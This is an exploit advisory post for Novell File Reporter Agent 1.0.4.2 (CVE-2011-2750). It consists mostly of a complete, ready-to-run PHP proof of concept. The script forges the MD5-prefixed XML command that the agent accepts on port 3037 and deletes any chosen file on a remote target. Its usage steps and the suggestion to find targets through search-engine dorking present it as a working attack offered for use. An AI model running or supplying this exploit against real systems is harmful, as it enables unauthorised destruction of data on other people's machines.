=============================================================================================================================================
| # Title     : NFR Agent 1.0.4.2 Arbitrary File Delete Vulnerability                                                                         |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.opentext.com/products/listing?o=mf                                                                              |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The code exploits a vulnerability in the Novell File Reporter Agent, which allows an attacker to remotely delete any file on the targeted system. It affects version 1.0.4.2 and below.
   
   (Related : https://packetstorm.news/files/id/180891/ Linked CVE numbers: CVE-2011-2750 ) .
	
[+] save code as poc.php.

[+] Set taget : Line 57.

[+] USage : php poc.php 

[+] PayLoad :

<?php

class NovellFileReporterExploit {
    private $target;
    private $port;
    private $ssl;
    private $filePath;

    public function __construct($target, $port = 3037, $ssl = true, $filePath = 'C:\\test.txt') {
        $this->target = $target;
        $this->port = $port;
        $this->ssl = $ssl;
        $this->filePath = $filePath;
    }

    private function md5Upper($data) {
        return strtoupper(md5($data));
    }

    public function deleteFile() {
        $protocol = $this->ssl ? 'https' : 'http';
        $url = "$protocol://{$this->target}:{$this->port}/FSF/CMD";

        $record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>5</CMD><PATH>{$this->filePath}</PATH></RECORD>";
        $md5Hash = $this->md5Upper('SRS' . $record . 'SERVER');
        $message = $md5Hash . $record;

        $response = $this->sendPostRequest($url, $message);

        if ($response && strpos($response, '<STATUS>0</STATUS>') !== false) {
            echo "[+] File {$this->filePath} successfully deleted\n";
        } else {
            echo "[-] File not deleted\n";
        }
    }

    private function sendPostRequest($url, $data) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: text/xml"]);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        
        if ($this->ssl) {
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        }

        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }
}

// استخدام الكود
$exploit = new NovellFileReporterExploit('target_ip_here');
$exploit->deleteFile();

?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================